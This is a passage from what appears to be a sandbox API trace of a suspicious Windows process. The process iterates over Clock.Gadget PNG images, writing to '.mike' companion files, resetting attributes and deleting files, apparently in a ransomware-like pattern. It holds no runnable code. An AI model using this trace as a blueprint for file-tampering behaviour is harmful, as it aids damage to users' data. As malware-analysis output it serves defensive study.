lpBuffer=0x21fedc8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x21fedc8*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.694] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.694] WriteFile (in: hFile=0x288, lpBuffer=0x2203124*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2203124*, lpNumberOfBytesWritten=0x2af074*=0xd0, lpOverlapped=0x0) returned 1 [0103.695] WriteFile (in: hFile=0x288, lpBuffer=0x2206354*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2206354*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.696] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.696] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.696] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png", dwFileAttributes=0x80) returned 0 [0103.698] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.698] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike", lpFilePart=0x0) returned 0x4e [0103.698] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_m.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_m.png.mike")) returned 1 [0103.703] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.703] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.703] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png", lpFilePart=0x0) returned 0x49 [0103.704] WriteFile (in: hFile=0x288, lpBuffer=0x220b454*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x220b454*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.707] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.707] WriteFile (in: hFile=0x288, lpBuffer=0x2213a9c*, nNumberOfBytesToWrite=0xbc0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2213a9c*, lpNumberOfBytesWritten=0x2af074*=0xbc0, lpOverlapped=0x0) returned 1 [0103.708] WriteFile (in: hFile=0x288, lpBuffer=0x2216ccc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2216ccc*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0103.709] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.709] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.709] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png", dwFileAttributes=0x80) returned 0 [0103.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.710] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike", lpFilePart=0x0) returned 0x4e [0103.711] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_s.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_s.png.mike")) returned 1 [0103.723] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.724] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png", lpFilePart=0x0) returned 0x50 [0103.724] WriteFile (in: hFile=0x288, lpBuffer=0x221bf78*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x221bf78*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0103.728] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.729] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.730] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.731] WriteFile (in: hFile=0x288, lpBuffer=0x223dd08*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x223dd08*, lpNumberOfBytesWritten=0x2af074*=0xa40, lpOverlapped=0x0) returned 1 [0103.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.732] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.732] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png", dwFileAttributes=0x80) returned 0 [0103.733] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.734] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike", lpFilePart=0x0) returned 0x55 [0103.734] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\system_settings.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\system_settings.png.mike")) returned 1 [0103.736] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.736] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", lpFilePart=0x0) returned 0x4a [0103.737] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png", lpFilePart=0x0) returned 0x45 [0103.750] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", lpFilePart=0x0) returned 0x4a [0103.751] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", lpFilePart=0x0) returned 0x4a [0103.751] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png", dwFileAttributes=0x80) returned 0 [0103.752] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", lpFilePart=0x0) returned 0x4a [0103.752] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike", lpFilePart=0x0) returned 0x4a [0103.752] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad.png.mike")) returned 1 [0103.755] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.756] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", lpFilePart=0x0) returned 0x4e [0103.756] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png", lpFilePart=0x0) returned 0x49 [0103.760] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", lpFilePart=0x0) returned 0x4e [0103.760] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", lpFilePart=0x0) returned 0x4e [0103.760] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png", dwFileAttributes=0x80) returned 0 [0103.761] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", lpFilePart=0x0) returned 0x4e [0103.761] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike", lpFilePart=0x0) returned 0x4e [0103.762] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_dot.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_dot.png.mike")) returned 1 [0103.764] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.764] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", lpFilePart=0x0) returned 0x4c [0103.764] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png", lpFilePart=0x0) returned 0x47 [0103.767] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", lpFilePart=0x0) returned 0x4c [0103.768] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", lpFilePart=0x0) returned 0x4c [0103.768] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png", dwFileAttributes=0x80) returned 0 [0103.769] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", lpFilePart=0x0) returned 0x4c [0103.769] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike", lpFilePart=0x0) returned 0x4c [0103.769] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_h.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_h.png.mike")) returned 1 [0103.772] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.772] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", lpFilePart=0x0) returned 0x4c [0103.773] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png", lpFilePart=0x0) returned 0x47 [0103.776] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", lpFilePart=0x0) returned 0x4c [0103.776] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", lpFilePart=0x0) returned 0x4c [0103.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png", dwFileAttributes=0x80) returned 0 [0103.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", lpFilePart=0x0) returned 0x4c [0103.777] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike", lpFilePart=0x0) returned 0x4c [0103.778] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_m.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_m.png.mike")) returned 1 [0103.780] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", lpFilePart=0x0) returned 0x4c [0103.780] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png", lpFilePart=0x0) returned 0x47 [0103.784] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", lpFilePart=0x0) returned 0x4c [0103.784] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", lpFilePart=0x0) returned 0x4c [0103.784] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png", dwFileAttributes=0x80) returned 0 [0103.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", lpFilePart=0x0) returned 0x4c [0103.786] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike", lpFilePart=0x0) returned 0x4c [0103.786] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_s.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_s.png.mike")) returned 1 [0103.789] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0103.789] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png.mike", lpFilePart=0x0) returned 0x53 [0103.790] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png", lpFilePart=0x0) returned 0x4e [0103.796] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png.mike", lpFilePart=0x0) returned 0x53 [0103.796] SetFileAttributesW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png", dwFileAttributes=0x80) returned 0 [0103.797] DeleteFileW (lpFileName="C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\images\\trad_settings.png.mike" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\images\\trad_settings.png.mike")) returned 1 [0103.798] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x728f520, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x728f520, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0103.799] FindNextFileW (in: hFindFile=0x4d1060, lpFindFileData=0x2aeedc | out: lpFindFileData=0x2aeedc*(dwFileAttributes=0x20, 